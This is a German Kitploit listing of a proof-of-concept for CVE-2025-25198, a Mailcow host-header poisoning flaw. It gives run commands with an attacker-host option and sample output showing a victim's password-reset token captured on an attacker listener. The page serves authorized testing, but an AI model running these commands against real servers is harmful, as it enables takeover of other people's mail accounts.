Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-25198-PoC — PoC für CVE-2025-25198: automatisierter Host-Header-Poisoning-Test für Mailcow - HTTPS-Listener, automatische Cookie-/CSRF-Verarbeitung, erfasst den ersten Reset-Link. | Kitploit
Tools/GitHubGitHub/groppoxx/cve-2025-25198-poc
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubgroppoxx/cve-2025-25198-poc

CVE-2025-25198-PoC

PoC für CVE-2025-25198: automatisierter Host-Header-Poisoning-Test für Mailcow - HTTPS-Listener, automatische Cookie-/CSRF-Verarbeitung, erfasst den ersten Reset-Link.

Repository anzeigen
2012vor 3 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2025-25198-PoC

Proof-of-Concept für CVE-2025-25198, ein Host-Header-Poisoning-Problem, das die Passwort-Reset-Flows von Mailcow betrifft.

Das Skript startet einen lokalen HTTPS-Listener auf Port 443, holt automatisch ein gültiges CSRF-Token, sendet die Passwort-Reset-Sequenz mit einem manipulierten Host-Header und stoppt, sobald ein Reset-Link entweder aus der HTTP-Antwort oder aus einem Callback an den Listener wiederhergestellt wurde.

Was es macht

  1. Startet einen HTTPS-Listener mit einem selbstsignierten Zertifikat.
  2. Erzeugt eine neue HTTP-Client-Sitzung.
  3. Holt automatisch ein CSRF-Token.
  4. Sendet den Reset-Flow mit einem kontrollierten Host-Header.
  5. Extrahiert Reset-Links aus Antworten und Weiterleitungen.
  6. Wartet auf einen Listener-Treffer, falls das Ziel den Link out-of-band sendet.
  7. Stoppt beim ersten gültigen Reset-Link und gibt ihn sauber aus.

Voraussetzungen

root@kitploit:~
Python 3.8+
OpenSSL im PATH
sudo/root-Rechte, um Port 443 zu binden
Eingehender TCP/443 vom Ziel erreichbar

Installation der Abhängigkeiten:

root@kitploit:~
pip install -r requirements.txt

Schnellstart

In spitze Klammern gesetzte Werte sind Platzhalter. Ersetzen Sie sie durch Ihre eigenen Werte und lassen Sie die Zeichen < oder > weg.

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url <MAILCOW_URL> \
  --username <MAILBOX> \
  --attacker-host <ATTACKER_HOST> \
  --http2

Platzhalter

root@kitploit:~
<MAILCOW_URL>    # Basis-URL des Ziel-Mailcow. Beispiel: https://mail.example.com
<MAILBOX>        # Postfach/Benutzer, das/der an das Reset-Formular übergeben wird. Normalerweise eine E-Mail-Adresse.
<ATTACKER_HOST>  # IP oder DNS-Name, den das Ziel auf TCP/443 erreichen kann.

Vollständiges Beispiel

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url https://mail.cows.com \
  --username [email protected] \
  --attacker-host 10.10.13.12 \
  --http2

Beispielausgabe:

root@kitploit:~
[2026-05-17T18:30:12Z] [+] HTTPS listener on https://0.0.0.0:443
[2026-05-17T18:30:13Z] [+] Auto CSRF: 0123456789abcdef...
[2026-05-17T18:30:13Z] [>] Sending sequence with poisoned Host
[2026-05-17T18:30:14Z] [HIT] GET /reset-password?token=AAAA-BBBB-CCCC-DDDD ← 10.10.13.12 [200]

╔════════════════════════════════════════════════════════════════════════════════╗
║  RESET LINK FOUND!  (listener)                                                 ║
╟════════════════════════════════════════════════════════════════════════════════╢
║  https://mail.cows.com/reset-password?token=AAAA-BBBB-CCCC-DDDD                ║
║  Target: mail.cows.com                                                         ║
╚════════════════════════════════════════════════════════════════════════════════╝

Demo

asciicast

Optionale Flags

root@kitploit:~
--http2
   HTTP/2 über httpx verwenden. Für beste Kompatibilität mit modernen Browsern empfohlen.

--interval <Sekunden>
   Sekunden zwischen Versuchen und Listener-Warteintervallen. Standard: 8

--max-attempts <N>
   Nach N Versuchen anhalten. Standard: 0, was unbegrenztes Wiederholen bedeutet.

--cookie '<Paare>'
   Client-Cookie-Jar manuell seeden.
   Beispiel: --cookie 'PHPSESSID=abcdef123456; another=value'

--csrf <TOKEN>
   Ein bekanntes CSRF-Token anstelle der automatischen Erkennung verwenden.

--only-final
   Fortschrittslogs ausblenden und nur das finale Reset-Link-Banner ausgeben.

Hinweise

  • Der Listener bindet immer an Port 443.
  • Unter Linux/macOS erfordert das Binden von Port 443 sudo oder root-Rechte.
  • Das Ziel muss https://<ATTACKER_HOST>/ erreichen können.
  • Wenn ein Reset-Link in einer HTTP-Antwort gefunden wird, beendet sich das Skript sofort.
  • Wird kein Link in der Antwort gefunden, wartet das Skript auf einen Callback an den HTTPS-Listener.
  • Wird kein Link wiederhergestellt, wiederholt die Sequenz standardmäßig alle 8 Sekunden.
  • server.pem und server.key werden automatisch generiert, falls sie fehlen.

Rechtliches

Dieser PoC ist für autorisierte Sicherheitstests, Laborumgebungen und die Überprüfung von Schwachstellen bestimmt. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.

Tool herunterladen